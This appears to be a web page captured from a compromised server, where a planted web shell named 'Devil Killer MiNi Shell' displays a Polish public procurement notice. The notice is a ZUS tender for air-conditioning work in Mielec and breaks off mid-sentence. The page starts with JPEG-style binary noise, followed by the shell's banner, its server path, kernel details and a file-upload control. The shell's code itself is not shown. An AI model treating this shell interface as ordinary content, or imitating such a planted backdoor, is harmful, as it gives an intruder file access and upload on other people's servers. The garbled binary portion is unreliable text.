JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250319/0015393401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie instalacji klimatyzacji w budynku Inspektoratu ZUS w Mielcu ul. Sikorskiego 4 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 00001775600180</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Piłsudskiego 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-075</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 86 75 203,</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampubl_rzeszow@zus.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zus.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Zakład Ubezpieczeń Społecznych lub Kasa Rolniczego Ubezpieczenia Społecznego oraz zarządzane przez nie fundusze</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ubezpieczenia społeczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie instalacji klimatyzacji w budynku Inspektoratu ZUS w Mielcu ul. Sikorskiego 4 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-20574142-c56b-4e9c-936f-6af969fc6d8a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00153934</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00576482/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Wykonanie instalacji klimatyzacji - w budynkach I/Leżajsk, I/Mielec, T/Tarnobrzeg</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez Platformę zakupową, umożliwiającą obsługę procesu udzielania zamówień publicznych za pośrednictwem środków komunikacji elektronicznej. http://portal.smartpzp.pl/zus</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korzystanie z Platformy zakupowej możliwe jest pod warunkiem spełnienia przez sprzęt, z którego korzystają użytkownicy Wykonawcy następujących<br/>minimalnych wymagań technicznych i specyfiki połączenia:<br/>- posiadanie komputera o parametrach umożliwiających zainstalowanie następującego oprogramowania:<br/><br/>1) w zakresie podstawowych funkcjonalności – przegląd, pobieranie i załączanie dokumentów:<br/>a) przeglądarka internetowa Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera w ver. 58 i<br/>późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>b) lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji<br/>przeglądarek,<br/>c) system operacyjny Windows 10 i późniejsze.<br/><br/>2) w zakresie składania podpisu kwalifikowanego:<br/>a) zainstalowane środowisko Java w wersji min. 1.8 (jre),<br/>b) w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web,<br/>c) oprogramowania SzafirHost w systemie operacyjnym.<br/>Instrukcja instalowania oprogramowania wskazanego w punkcie 1) lit. a, b i c powyżej znajduje się na Platformie zakupowej w<br/>zakładce E-learning.<br/><br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług Platformy zakupowej (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich użytkowników Platformy zakupowej oraz podczas rejestracji konta Wykonawcy dla Wykonawców, pod adresem: http://portal.smartpzp.pl/zus.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">12 KLAUZULA INFORMACYJNA - ART. 13 RODO<br/>12.1 Wobec wytycznych Urzędu Zamówień Publicznych przedstawiamy poniższe informacje.<br/>12.1.1. W zamówieniach publicznych, Zamawiający jako administrator danych osobowych, obowiązany jest do spełnienia obowiązku<br/>informacyjnego z art. 13 RODO względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Dotyczy to w<br/>szczególności:<br/>• wykonawcy będącego osobą fizyczną,<br/>• wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą,<br/>• pełnomocnika wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w pełnomocnictwie),<br/>• członka organu zarządzającego wykonawcy, będącego osobą fizyczną (np. dane osobowe zamieszczone w informacji z KRK),<br/>• osoby fizycznej skierowanej do przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>• administratorem Pani/Pana danych osobowych jest Zakład Ubezpieczeń Społecznych z siedzibą w Warszawie, ul. Szamocka 3, 5,<br/>01-748 Warszawa;<br/>• inspektorem ochrony danych osobowych w Zakładzie Ubezpieczeń Społecznych jest Inspektor Ochrony Danych, kontakt: eZUS<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na Wykonanie instalacji klimatyzacji w budynku Inspektoratu ZUS w Stalowej Woli przy ul.<br/>Popiełuszki 8. znak postępowania: 350000/271/3/2023-ZAP prowadzonym w trybie podstawowym art. 257 pkt. 1 ustawy;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO**;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>12.2 Zgodnie z wytycznymi Urzędu Zamówień Publicznych, Wykonawca powinien złożyć stosowne oświadczenie. Treść<br/>oświadczenia została zawarta w pkt. 3.10 Formularza oferty, stanowiącego Załącznik nr 1 do SWZ.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz<br/>jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">350000/271/5/2025-ZAP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 746964,55 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie A Budynek I/ZUS w Mielcu, ul. Sikorskiego 4.<br/> W ramach zakupu i montażu instalacji i klimatyzacji dla pomieszczeń (parter, pom. 1, 3, 4, 4, 6) należy:<br/>	Zamontować jednostkę zewnętrzną klimatyzatora typu multi-split inwerter o mocy chłodniczej minimum 10 kW oraz o parametrach nie gorszych niż: poziom ciśnienia akustycznego na najwyższym biegu poniżej dB(A) +/- 52; czynnik chłodzący R410A. <br/>	Zamontować jednostki wewnętrzne typ ścienny – 5 sztuk, min 2kW, poziom ciśnienia akustycznego na najwyższym biegu nie większy niż 39 dB (dostarczyć piloty bezprzewodowe do w/w jednostek). Jednostki wewnętrzne podłączyć do kontaktronów zainstalowanych na oknach tak aby możliwe było wyłączenie klimatyzatora zarówno przy otwarciu okna lub jego uchyleniu. Przewody podłączyć do wejść sterujących klimatyzatora.<br/>	Wykonać niezbędne przebicia przez ściany dla rur oraz przewodów <br/>	Naprawić wykonane przebicia przez ściany <br/>	Zamontować rurociągi z rur winidurowych Φ 20mm do odprowadzenia skroplin <br/>	Zamontować rurociągi z rur miedzianych w izolacji dla obiegu środka chłodzącego – , minimum Φ 3/4” i 3/8” (w korytkach tam gdzie nie ma sufitu podwieszanego)<br/>	Zamontować przewody miedziane o przekroju 2,5mm dla zasilania agregatów klimatyzacyjnych<br/>	Zainstalować osprzęt modułowy w nowobudowanej rozdzielnicy elektrycznej piętrowych, wyłącznik różnicowo-nadprądowy 25A typu C 1-fazowy -1 szt. <br/>	Zainstalować osprzęt modułowy w rozdzielnicach elektrycznych piętrowych, wyłącznik różnicowo-nadprądowy 16A typu C 1-fazowy -1 szt. dla jednostek wewnętrznych. <br/>	Napełnić urządzenia i instalacje obiegu czynnikiem chłodzącym <br/>	Wykonać niezbędne pomiary elektryczne<br/>	Jednostki zewnętrzne montowane na dachu budynku należy uziemić do najbliższej instalacji uziemiającej i wykonać pomiary uziemienia.<br/>	Sprawdzić i uruchomić system klimatyzacji<br/>	Wykonać przeglądy w okresie gwarancyjnym według zaleceń producenta bez dodatkowego wynagrodzenia (wynagrodzenie za przeglądy włączyć do oferty)<br/>	Przykładowe rozmieszczenie jednostek pokazano na rysunkach w załączeniu.<br/><br/><br/>Zadanie B Budynek I/ZUS w Mielcu, ul. Sikorskiego 4. <br/>W ramach zakupu i montażu klimatyzatora dla pomieszczeń na parterze (pom. 8, 9, 10, 12, 14) – należy:<br/>	Zamontować jednostkę zewnętrzną klimatyzatora typu multi-split inwerter o mocy chłodniczej minimum 10 kW oraz o parametrach nie gorszych niż: poziom ciśnienia akustycznego na najwyższym biegu w dB(A) +/- 55; czynnik chłodzący R410A lub R32. <br/>	Zamontować jednostki wewnętrzne typ ścienny – 5 sztuk, min 2kW każda, poziom ciśnienia akustycznego na najwyższym biegu max.39 dB (dostarczyć piloty bezprzewodowe do w/w jednostek). Jednostki wewnętrzne podłączyć do kontaktronów zainstalowanych na oknach tak aby możliwe było wyłączenie klimatyzatora zarówno przy otwarciu okna lub jego uchyleniu. Przewody podłączyć do wejść sterujących klimatyzatora.<br/>	Wykonać niezbędne przebicia przez ściany dla rur oraz przewodów <br/>	Naprawić wykonane przebicia przez ściany <br/>	Zamontować rurociągi z rur winidurowych Φ 20mm do odprowadzenia skroplin <br/>	Zamontować rurociągi z rur miedzianych w izolacji dla obiegu środka chłodzącego – , minimum Φ 3/4” i 3/8” (w korytkach tam gdzie nie ma sufitu podwieszanego)<br/>	Zamontować przewody miedziane o przekroju 2,5mm dla zasilania agregatów klimatyzacyjnych<br/>	Zainstalować osprzęt modułowy w rozdzielnicach elektrycznych piętrowych, wyłącznik różnicowo-nadprądowy 20A typu C 1-fazowy -1 szt. <br/>	Zainstalować osprzęt modułowy w rozdzielnicach elektrycznych piętrowych, wyłącznik różnicowo-nadprądowy 16A typu C 1-fazowy -1 szt. dla jednostek wewnętrznych. <br/>	Napełnić urządzenia i instalacje obiegu czynnikiem chłodzącym <br/>	Wykonać niezbędne pomiary elektryczne<br/>	Jednostki zewnętrzne montowane na dachu budynku należy uziemić do najbliższej instalacji uziemiającej i wykonać pomiary uziemienia.<br/>	Sprawdzić i uruchomić system klimatyzacji<br/>	Wykonać przeglądy w okresie gwarancyjnym według zaleceń producenta bez dodatkowego wynagrodzenia (wynagrodzenie za przeglądy włączyć do oferty)<br/>Przykładowe rozmieszczenie jednostek pokazano na rysunkach w załączeniu.<br/><br/>Zadanie C: Budynek I/ZUS w Przemyślu, ul. Brodzińskiego 6. W ramach zakupu i montażu klimatyzatora dla pomieszczeń na I piętrze (pom. 101 – 111) – należy:<br/>	Zamontować jednostkę zewnętrzną klimatyzatora typu VRF inwerter o mocy chłodniczej minimum 22 kW oraz o parametrach nie gorszych niż: poziom ciśnienia akustycznego na najwyższym biegu był mniejszy niż dB(A) +/- 55; czynnik chłodzący R410A lub R32. <br/>	Zamontować jednostki wewnętrzne typ ścienny – 11 sztuk, min 2kW, poziom ciśnienia akustycznego na najwyższym biegu max.39 dB (dostarczyć piloty bezprzewodowe do w/w jednostek). Jednostki wewnętrzne podłączyć do kontaktronów zainstalowanych na oknach tak aby możliwe było wyłączenie klimatyzatora zarówno przy otwarciu okna lub jego uchyleniu. Przewody podłączyć do wejść sterujących klimatyzatora.<br/>	Wykonać niezbędne przebicia przez ściany dla rur oraz przewodów <br/>	Naprawić wykonane przebicia przez ściany <br/>	Zamontować rurociągi z rur winidurowych Φ 20mm do odprowadzenia skroplin <br/>	Zamontować rurociągi z rur miedzianych w izolacji dla obiegu środka chłodzącego – , minimum Φ 3/4” i 3/8”<br/>	Zamontować przewody miedziane o przekroju 2,5mm dla zasilania agregatów klimatyzacyjnych<br/>	Zainstalować osprzęt modułowy w rozdzielnicach elektrycznych piętrowych, wyłącznik różnicowo-nadprądowy 20A typu C 3-fazowy -1 szt. <br/>	Zainstalować osprzęt modułowy w rozdzielnicach elektrycznych piętrowych, wyłącznik różnicowo-nadprądowy 16A typu C 1-fazowy -1 szt. dla jednostek wewnętrznych. <br/>	Napełnić urządzenia i instalacje obiegu czynnikiem chłodzącym <br/>	Wykonać niezbędne pomiary elektryczne<br/>	Jednostki zewnętrzne montowane na dachu budynku należy uziemić do najbliższej instalacji uziemiającej i wykonać pomiary uziemienia.<br/>	Sprawdzić i uruchomić system klimatyzacji<br/>	Wykonać przeglądy w okresie gwarancyjnym według zaleceń producenta bez dodatkowego wynagrodzenia (wynagrodzenie za przeglądy włączyć do oferty)<br/>Jednostkę zewnętrzną zainstalować na dachu budynku.<br/>Przykładowe rozmieszczenie jednostek pokazano na rysunkach w załączeniu.<br/><br/><br/>Pozostałe zapisy znajdują się w OPZ i dokumentacji projektowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45331220-4 - Instalowanie urządzeń klimatyzacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości robót budowlanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na urządzenia i instalacje klimatyzacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek w zakresie zdolności technicznej (doświadczenia) jeżeli wykaże, że w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie<br/>wykonał co najmniej jedną robotę budowlaną zgodną z przedmiotem zamówienia ( roboty instalacyjno–montażowe<br/>klimatyzacji) o wartości każdej roboty nie mniejszej niż 150.000,00 zł brutto. (zgodnie z Załącznikiem nr 7 do SWZ)<br/>Zamawiający nie dopuszcza możliwości sumowania wartości usług wykonywanych w ramach różnych umów w celu<br/>osiągnięcia wymaganej wartości.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia np. konsorcjum, mogą polegać na zdolnościach technicznych<br/>tych z wykonawców, którzy wykonują roboty budowlane, do realizacji których te zdolności są wymagane.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia przedmiotowy warunek zostanie uznany za<br/>spełniony jeżeli ww. warunek spełni jeden z nich. -<br/>W takim przypadku, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy (zgodnie 